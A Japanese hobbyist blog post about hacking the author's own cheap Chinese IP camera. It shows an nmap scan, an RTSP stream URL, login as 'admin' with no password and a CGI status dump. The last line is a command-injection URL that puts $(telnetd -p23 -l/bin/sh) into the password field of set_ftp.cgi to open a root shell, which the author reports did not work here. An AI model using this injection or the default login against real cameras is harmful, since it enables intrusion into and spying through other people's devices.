別の監視カメラのハッキング
別の中華製監視カメラも持っており、これはサーバがダウンしっぱなしで用をなさなくなったうえに、電池が膨らんで裏蓋が外れてしまうという、超粗悪品だったが、ハッキングするにはちょうど良い。
$ nmap 192.168.11.33 Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-11 15:55 JST Nmap scan report for 192.168.11.33 Host is up (0.013s latency). Not shown: 997 closed ports PORT STATE SERVICE 80/tcp open http 81/tcp open hosts2-ns 554/tcp open rtsp
ポートは80番のhttp、81番のhosts2-nsそして554番のrtspが開いている。
rtspは以下のようなURLをストリーミング再生に対応した動画プレイヤーたとえばVLC media playerで、
rtsp://192.168.11.33:554/rtsp_live0
とすれば見れる。URLのフォルダが機種によって異なるが、これはたまたま発見できた。
httpが開いているので、ブラウザで、
http:/192.168.11.33/
とするとIDとパスワードを聞かれる。パスワードなしのadminで認証された。
で、cgiが使えたりしないかと思ってググると何やらPDFが見つかった。例えば、
http://192.168.11.33/get_status.cgi
とすると、こんなんが返ってきた。
var id='0022C0737280'; var sys_ver='2.0'; var app_ver='1.9.8 E'; var fw_type_upg=''; var fw_ver=67847; var alias='Cam'; var now=1594456636; var tz=-28800; var alarm_status=0; var ddns_status=0; var ddns_host=''; var oray_type=0; var upnp_status=0; var msn_status=0;
このページを頼りにハッキングしてみたが、telnetが動くようなことはできなかった。
http://r00tapple.hatenablog.com/entry/2017/08/12/050252
http://r00tapple.hatenablog.com/entry/2017/08/12/050252
http://192.168.11.33/set_ftp.cgi?svr=192.168.1.1&port=21&user=admin&pwd=$(telnetd -p23 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0 http://192.168.11.33/test_ftp.cgi